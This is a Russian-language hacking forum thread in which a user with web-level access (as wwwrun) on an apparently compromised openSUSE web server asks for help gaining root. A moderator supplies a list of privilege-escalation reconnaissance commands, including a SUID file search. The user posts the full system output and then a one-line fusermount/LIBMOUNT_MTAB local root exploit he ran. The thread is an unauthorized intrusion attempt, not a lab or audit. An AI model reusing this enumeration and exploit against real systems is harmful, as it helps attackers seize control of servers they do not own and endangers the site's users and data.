Помощи новичкам нить.

Discussion in 'Песочница' started by Bezlishke, 16 Jul 2015.

  1. Bezlishke

    Bezlishke Member

    Joined:
    18 May 2015
    Messages:
    26
    Likes Received:
    12
    Reputations:
    3
    Тут будем друг-другу помогать.

    Я имею:
    Apache
    Linux halfquake 3.16.7-7-default #1 SMP Wed Dec 17 18:00:44 UTC 2014 (762f27a) x86_64
    uid=30(wwwrun) gid=8(www) groups=8(www)

    Я хочу
    uid=0 gid=0 groups=0

    НЕ могу найти LRE. ТАк же имеетя логпасс от мускуля.
     
  2. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    А что вообще пробовали, какие сплойты? Что за ОС?
     
  3. Bezlishke

    Bezlishke Member

    Joined:
    18 May 2015
    Messages:
    26
    Likes Received:
    12
    Reputations:
    3
    Дело в том, что не могу найти подходящий под версию Local сплоит, для бэкконнекта тоже. Это дичь, какая-то.
     
  4. Bezlishke

    Bezlishke Member

    Joined:
    18 May 2015
    Messages:
    26
    Likes Received:
    12
    Reputations:
    3
    Вы немного ошиблись. ЧСВ тут не причём, дело в том, что многие oldFAGS думают, что каждый человек с регой позже 14-го года с iq одноклеточного.
    Довожу до вас, что мы- новореги с мозгом хлебушка, можем почувстовать свободу постинга только в песочнице. По сему тема и создана.
    Вспасибо за ваше внимание.
     
  5. Bezlishke

    Bezlishke Member

    Joined:
    18 May 2015
    Messages:
    26
    Likes Received:
    12
    Reputations:
    3
    Сделайте себя немножко уважать вашего собеседника, господин модератор. Актуальный, тот который будет способен работать при совокупности условий обусловленных ОС таргета.
     
  6. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    И какие же условия вы применили что у вас за 1.5 года не подошел ни один сплоент? Какой логикой вы руководствовались при выборе сплоента?
     
  7. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    Прекрасно осведомлен,для чего создана песочница, под ваш вопрос О ПОДНЯТИИ ПРАВ нужно оформить тему данным образом,как я привел по ссылке выше.Для не новичков,ваш вопрос похож на "вот есть какой-то сервер у меня,как поднять права".
    Они не думают,они просто читают вопрос и сразу видят,что человек сделал сам,а что пытается просто перебросить на других

    Сделайте вывод следующих команд

    Code:
        uname -a
        ls -la /boot
        lls -la --full-time /lib (или /lib64)
        mount
        df -h
        cat /etc/issue
        cat /etc/crontab (ls -la cron.d, cron.hourly, cron.monthly, cron.weekly) + вывод содержимого каждого файла из этих директорий.
        cat /proc/version
        cat /proc/sys/vm/mmap_min_addr
        pwd
        ls -la /usr/bin/staprun
        find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
    
    Так же обязательно писать всё, что вы пробовали для повышения привилегий, какие возникли ошибки.
     
    _________________________
    #7 grimnir, 19 Jul 2015
    Last edited: 19 Jul 2015
    b3 likes this.
  8. Bezlishke

    Bezlishke Member

    Joined:
    18 May 2015
    Messages:
    26
    Likes Received:
    12
    Reputations:
    3
    Откуда такие цифры?
    Перечитайте и поправьте логические ошибки.
    1) Описание и комментарии автора.
    2) Соответсвие версии (она должна быть не меннее указанной на сервере)

    Я перерыл багтрекеры Дебиана, Сусей, Убунты, Арча. Судя по найденной информации багфиксы были и по уязвимостым прошлых версий.

    Linux halfquake 3.16.7-7-default #1 SMP Wed Dec 17 18:00:44 UTC 2014 (762f27a) x86_64 x86_64 x86_64 GNU/Linux
    total 49957
    drwxr-xr-x 5 root root 1024 Feb 6 11:40 .
    drwxr-xr-x 22 root root 4096 Feb 6 13:41 ..
    -rw-r--r-- 1 root root 65 Dec 17 2014 .vmlinuz-3.16.7-7-default.hmac
    -rw-r--r-- 1 root root 2912183 Dec 17 2014 System.map-3.16.7-7-default
    -rw-r--r-- 1 root root 512 Oct 10 2014 backup_mbr
    -rw-r--r-- 1 root root 1484 Oct 22 2014 boot.readme
    -rw-r--r-- 1 root root 148363 Dec 17 2014 config-3.16.7-7-default
    drwxr-xr-x 2 root root 1024 Nov 27 2014 dracut
    drwxr-xr-x 7 root root 1024 Feb 6 11:40 grub2
    lrwxrwxrwx 1 root root 23 Dec 22 2014 initrd -> initrd-3.16.7-7-default
    -rw------- 1 root root 35745308 Feb 6 11:40 initrd-3.16.7-7-default
    drwx------ 2 root root 12288 Oct 10 2014 lost+found
    -rw-r--r-- 1 root root 309712 Dec 17 2014 symvers-3.16.7-7-default.gz
    -rw-r--r-- 1 root root 409 Dec 17 2014 sysctl.conf-3.16.7-7-default
    -rw-r--r-- 1 root root 6378104 Dec 17 2014 vmlinux-3.16.7-7-default.gz
    lrwxrwxrwx 1 root root 24 Dec 22 2014 vmlinuz -> vmlinuz-3.16.7-7-default
    -rw-r--r-- 1 root root 5427272 Dec 17 2014 vmlinuz-3.16.7-7-default

    Оба варианта не дали выхлопа
    /dev/md2 on / type ext4 (rw,relatime,data=ordered)
    rpc_pipefs on /var/lib/nfs/rpc_pipefs type rpc_pipefs (rw,relatime)
    devtmpfs on /dev type devtmpfs (rw,nosuid,size=8168852k,nr_inodes=2042213,mode=755)
    tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
    devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)
    mqueue on /dev/mqueue type mqueue (rw,relatime)
    hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime)
    proc on /proc type proc (rw,relatime)
    systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=27,pgrp=1,timeout=300,minproto=5,maxproto=5,direct)
    sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
    securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)
    tmpfs on /sys/fs/cgroup type tmpfs (rw,nosuid,nodev,noexec,mode=755)
    cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/usr/lib/systemd/systemd-cgroups-agent,name=systemd)
    cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
    cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)
    cgroup on /sys/fs/cgroup/memory type cgroup (rw,nosuid,nodev,noexec,relatime,memory)
    cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
    cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
    cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
    cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
    cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
    cgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb)
    pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime)
    debugfs on /sys/kernel/debug type debugfs (rw,relatime)
    tmpfs on /run type tmpfs (rw,nosuid,nodev,mode=755)
    /dev/md1 on /boot type ext3 (rw,relatime,stripe=4,data=ordered)
    /dev/md3 on /home type ext4 (rw,relatime,data=ordered)
    /dev/md2 on /tmp type ext4 (rw,relatime,data=ordered)
    /dev/md2 on /var/tmp type ext4 (rw,relatime,data=ordered)

    Filesystem Size Used Avail Use% Mounted on
    /dev/md2 1008G 23G 935G 3% /
    devtmpfs 7.8G 0 7.8G 0% /dev
    tmpfs 7.9G 0 7.9G 0% /dev/shm
    tmpfs 7.9G 0 7.9G 0% /sys/fs/cgroup
    tmpfs 7.9G 1.7M 7.9G 1% /run
    /dev/md1 488M 58M 405M 13% /boot
    /dev/md3 1.7T 1.6G 1.7T 1% /home
    Welcome to openSUSE 13.2 "Harlequin" - Kernel \r (\l).
    Не дало выхлопа. Ничего.
    Linux version 3.16.7-7-default (geeko@buildhost) (gcc version 4.8.3 20140627 [gcc-4_8-branch revision 212064] (SUSE Linux) ) #1 SMP Wed Dec 17 18:00:44 UTC 2014 (762f27a)
    65536
    /srv/www/htdocs/iad/forum/adm/images
    Не дало выхлопа
    -rwsr-xr-x 1 root root 114912 Sep 29 2014 /sbin/mount.nfs
    -rwsr-xr-x 1 root shadow 35560 Sep 25 2014 /sbin/unix_chkpwd
    -rwsr-xr-x 1 root shadow 62976 Sep 25 2014 /usr/bin/gpasswd
    -rwsr-xr-x 1 root root 26656 Jan 13 2015 /usr/bin/pkexec
    -rwsr-xr-x 1 root shadow 41400 Sep 25 2014 /usr/bin/chsh
    -rwsr-xr-x 1 root shadow 63368 Sep 25 2014 /usr/bin/chage
    -rwsr-xr-x 1 root shadow 50584 Sep 25 2014 /usr/bin/chfn
    -rwsr-xr-x 1 root root 31680 Jan 8 2015 /usr/bin/umount
    -rwsr-xr-x 1 root shadow 51200 Sep 25 2014 /usr/bin/passwd
    -rwsr-xr-x 1 root root 31808 Jan 8 2015 /usr/bin/su
    -rwsr-xr-x 1 root root 40128 Jan 8 2015 /usr/bin/mount
    -rwsr-xr-x 1 root shadow 19272 Sep 25 2014 /usr/bin/expiry
    -rwsr-xr-x 1 root root 36632 Sep 25 2014 /usr/bin/newgrp
    -rwsr-xr-x 1 root trusted 55944 Oct 6 2014 /usr/bin/crontab
    -rwsr-xr-x 1 root root 155112 Oct 8 2014 /usr/bin/sudo
    -rwsr-xr-x 1 root root 14376 Jan 13 2015 /usr/lib/polkit-1/polkit-agent-helper-1
    -rwsr-x--- 1 root messagebus 294560 Jan 22 14:54 /lib/dbus-1/dbus-daemon-launch-helper
    grimnir, прошу прощения за то, что допустил ошибку оформления. Это первый в моей жизни подобный вопрос. Первый блин всегда комом. Надеюсь это достаточная информация.
     
    grimnir likes this.
  9. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
  10. Bezlishke

    Bezlishke Member

    Joined:
    18 May 2015
    Messages:
    26
    Likes Received:
    12
    Reputations:
    3
    К сожалению не могу увидеть нужной мне версии (По моему мнению)
     
  11. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
  12. Bezlishke

    Bezlishke Member

    Joined:
    18 May 2015
    Messages:
    26
    Likes Received:
    12
    Reputations:
    3
    Вроде выполнил
    Code:
    a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a
    Но ничего так и не получил.
     
  13. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    Ты бы комментарии почитал на форуме к сплоенту

     
    grimnir likes this.
Loading...